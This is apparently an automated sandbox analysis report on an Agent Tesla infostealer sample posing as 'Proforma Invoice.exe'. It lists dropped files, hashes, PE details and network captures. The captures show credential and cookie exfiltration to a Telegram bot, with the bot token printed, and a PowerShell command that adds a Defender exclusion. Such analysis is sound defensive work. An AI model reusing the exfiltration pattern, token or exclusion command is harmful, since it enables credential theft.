                                                                                                  SHA-512:59FBB6F025F0E0AA087F63EE9803E2054B57E3400FF39EC734F01F86724BD423D03FC452FBF979BAAA01DD73DBC9EF7F9E285701F7821584F20746BEEC00E249
                                                                                                  Malicious:true
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailab

                                                                                                  C:\Users\user\AppData\Local\VW\Proforma_Invoice.exe_Url_t0gf1ilcromh4xo3razml1b1abkwbdbz\1.0.0.0\j40r1j1p.newcfg

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):1681
                                                                                                  Entropy (8bit):4.65463587053992
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:crr7HKs7HqlDMEAnM/3Jn6UyLEAn+/TELe:ur7Z7KdZAnkJnigAnM0e
                                                                                                  MD5:0A211DC1DDB25EA8DE763A50AC2B84ED
                                                                                                  SHA1:A4EC9B02A3CB4DFB2A8D17A4D4519940D1E65D3F
                                                                                                  SHA-256:1306138CC76C95715A56E2074AD8371F3477FD2E576ACDB756F638E70553AB56
                                                                                                  SHA-512:FFFCED8D8B7353DDDE9174C6186ED86AAFA00F53899ADD70C290BB1C0CF6113A9560E1322E22AC56748E4DB9228FC607B8454CC1A6F351C4F0C5420EEF5140F4
                                                                                                  Malicious:false
                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="System.Windows.Forms.ToolStripSettings.VW.gs.toolStripConnectionGui" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <System.Windows.Forms.ToolStripSettings.VW.gs.toolStripConnectionGui>.. <setting name="ItemOrder" serializeAs="String">.. <value />.. </setting>.. <setting name="IsDefault" serializeAs="String">.. <value>False</value>.. </setting>.. <setting name="Size" serializeAs="String">.. <value>80,

                                                                                                  C:\Users\user\AppData\Roaming\djcexenx.rlb\Chrome\Default\Cookies

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20480
                                                                                                  Entropy (8bit):0.6951152985249047
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                  MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                  SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                  SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                  SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):901120
                                                                                                  Entropy (8bit):7.517387623724626
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:5UUGN9KWB4EsWm1gemIojjm9kGwW0TdepTp6eBbHsO8v+L98JxGQaEiSoQHljtGY:fWBfIFEK0ToxWOM+L213sNa
                                                                                                  MD5:BEA52E8910C076F5720AC20970E48A10
                                                                                                  SHA1:42777245A3F79EA5B2BCF1EA48811111B1CC3529
                                                                                                  SHA-256:8D5F8190EC870DB510D2B95B830A07BF3C67D9996DF775778DFA82B6C2BDD7B3
                                                                                                  SHA-512:9CED8C19A96F0200C940300C1D28C087AC3342F930458BCD7DD6F8396147366DC1B244F06C2031D7C8AB1B10828C0D2BC177C952146E929D9F34A477E156AAFF
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 37%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!.b..............0.................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......0)..............................................................b(....8.....(....8......*.....(....*&~.......*...~....*.f(....8......(....8......*..~(....8............(....8......*.0..C.......88...*...(....8......(....(....8...........&8...........8.....8.............$+......R8.....*...o....8........0..........8v.......E............8).....9....8`...... ....(....:....& ....8.......(....(....8...........&8...........8......(....8......9+...8......(....(....8.....*.(....

                                                                                                  C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe:Zone.Identifier

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:true
                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                  C:\Users\user\Documents\20220718\PowerShell_transcript.287400.izphoHbJ.20220718102444.txt

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5835
                                                                                                  Entropy (8bit):5.378528655382153
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZJTL5NyqDo1Z5ZRTL5NyqDo1ZLAG4jZ+TL5NyqDo1ZJRIIgZf:R
                                                                                                  MD5:70815EBE804F753B9A677BB1E25137DD
                                                                                                  SHA1:7FC1233A605DFBD079501B510C2087A49B984A7A
                                                                                                  SHA-256:1CA6785BBCA9AEEAEF78064E96E64841058DC04F131C3E5DA187795CC4B55246
                                                                                                  SHA-512:F900B7881BFDA6F994B833D835512C21F0D4380230D293D460459E33F74ACA96512F4D52C2734C6283AF1FA4783D177F24593385D992EB9CFA5B01F493694D61
                                                                                                  Malicious:false
                                                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220718102446..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe..Process ID: 2936..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220718102446..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe..**********************..Windows PowerShell transcript start..Start time: 20220718102918..Username: computer\user..RunAs Use

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.517387623724626
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  File name:Proforma Invoice.exe
                                                                                                  File size:901120
                                                                                                  MD5:bea52e8910c076f5720ac20970e48a10
                                                                                                  SHA1:42777245a3f79ea5b2bcf1ea48811111b1cc3529
                                                                                                  SHA256:8d5f8190ec870db510d2b95b830a07bf3c67d9996df775778dfa82b6c2bdd7b3
                                                                                                  SHA512:9ced8c19a96f0200c940300c1d28c087ac3342f930458bcd7dd6f8396147366dc1b244f06c2031d7c8ab1b10828c0d2bc177c952146e929d9f34a477e156aaff
                                                                                                  SSDEEP:12288:5UUGN9KWB4EsWm1gemIojjm9kGwW0TdepTp6eBbHsO8v+L98JxGQaEiSoQHljtGY:fWBfIFEK0ToxWOM+L213sNa
                                                                                                  TLSH:0615F12AFF25CE66C2185B36C4F70B44177446768312EF8F2BF451A82D133AB2D86AD5
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!.b..............0.................. ........@.. ....................... ............@................................

                                                                                                  File Icon

                                                                                                  Icon Hash:142b5cd6d6184310

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x4dc5de
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x62CD21F9 [Tue Jul 12 07:25:45 2022 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xdc5900x4b.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xde0000x1514.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xe00000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000xda5e40xda600False0.8210861476817402data7.524828218449115IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0xde0000x15140x1600False0.708984375data6.729702530740709IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xe00000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                  RT_ICON0xde1300xecfPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                  RT_GROUP_ICON0xdf0000x14data
                                                                                                  RT_VERSION0xdf0140x314data
                                                                                                  RT_MANIFEST0xdf3280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  192.168.2.6149.154.167.220497814432851779 07/18/22-10:25:15.675809TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49781443192.168.2.6149.154.167.220

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jul 18, 2022 10:25:14.158590078 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:14.158643007 CEST44349781149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:14.158837080 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:14.265738964 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:14.265777111 CEST44349781149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:14.336097002 CEST44349781149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:14.336405993 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:14.341516018 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:14.341531992 CEST44349781149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:14.341778040 CEST44349781149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:14.429742098 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:15.644831896 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:15.672501087 CEST44349781149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:15.675651073 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:15.716495037 CEST44349781149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:15.812889099 CEST44349781149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:15.813043118 CEST44349781149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:15.813143969 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:15.814522982 CEST49781443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:18.829792976 CEST49785443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:18.829880953 CEST44349785149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:18.830013990 CEST49785443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:18.830478907 CEST49785443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:18.830501080 CEST44349785149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:18.895765066 CEST44349785149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:18.952868938 CEST49785443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:19.056626081 CEST49785443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:19.056664944 CEST44349785149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:19.090744019 CEST44349785149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:19.091398954 CEST49785443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:19.091489077 CEST44349785149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:19.267921925 CEST44349785149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:19.268026114 CEST44349785149.154.167.220192.168.2.6
                                                                                                  Jul 18, 2022 10:25:19.268147945 CEST49785443192.168.2.6149.154.167.220
                                                                                                  Jul 18, 2022 10:25:19.283899069 CEST49785443192.168.2.6149.154.167.220

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jul 18, 2022 10:25:14.116041899 CEST5655053192.168.2.68.8.8.8
                                                                                                  Jul 18, 2022 10:25:14.133363008 CEST53565508.8.8.8192.168.2.6
                                                                                                  Jul 18, 2022 10:25:18.808872938 CEST5987153192.168.2.68.8.8.8
                                                                                                  Jul 18, 2022 10:25:18.828447104 CEST53598718.8.8.8192.168.2.6

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Jul 18, 2022 10:25:14.116041899 CEST192.168.2.68.8.8.80x7c8bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                  Jul 18, 2022 10:25:18.808872938 CEST192.168.2.68.8.8.80xfae3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Jul 18, 2022 10:25:14.133363008 CEST8.8.8.8192.168.2.60x7c8bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                  Jul 18, 2022 10:25:18.828447104 CEST8.8.8.8192.168.2.60xfae3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • api.telegram.org

                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.649781149.154.167.220443C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2022-07-18 08:25:15 UTC0OUTPOST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=---------------------------8da68ac1cc55b48
                                                                                                  Host: api.telegram.org
                                                                                                  Content-Length: 1022
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  2022-07-18 08:25:15 UTC0INHTTP/1.1 100 Continue
                                                                                                  2022-07-18 08:25:15 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 36 38 61 63 31 63 63 35 35 62 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 35 39 35 33 31 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 36 38 61 63 31 63 63 35 35 62 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 32 38 37 34 30 30 0a 4f 53 46
                                                                                                  Data Ascii: -----------------------------8da68ac1cc55b48Content-Disposition: form-data; name="chat_id"5359531870-----------------------------8da68ac1cc55b48Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/287400OSF
                                                                                                  2022-07-18 08:25:15 UTC1INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Mon, 18 Jul 2022 08:25:15 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 638
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  {"ok":true,"result":{"message_id":524,"from":{"id":5573921253,"is_bot":true,"first_name":"Johnero","username":"Johnerobot"},"chat":{"id":5359531870,"first_name":"Reuben","last_name":"Eric","username":"Wirewire101","type":"private"},"date":1658132715,"document":{"file_name":"user-287400 2022-07-18 10-55-48.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAICDGLVGOvRTphAugKhCRikmDnIPpSLAAKVCwACpVaoUseqfWJ_Fiv3KQQ","file_unique_id":"AgADlQsAAqVWqFI","file_size":446},"caption":"New PW Recovered!\n\nUser Name: user/287400\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.649785149.154.167.220443C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2022-07-18 08:25:19 UTC2OUTPOST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=---------------------------8da68ad9679701f
                                                                                                  Host: api.telegram.org
                                                                                                  Content-Length: 1900
                                                                                                  Expect: 100-continue
                                                                                                  2022-07-18 08:25:19 UTC2INHTTP/1.1 100 Continue
                                                                                                  2022-07-18 08:25:19 UTC2OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 36 38 61 64 39 36 37 39 37 30 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 35 39 35 33 31 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 36 38 61 64 39 36 37 39 37 30 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 32 38 37 34 30 30
                                                                                                  Data Ascii: -----------------------------8da68ad9679701fContent-Disposition: form-data; name="chat_id"5359531870-----------------------------8da68ad9679701fContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/287400
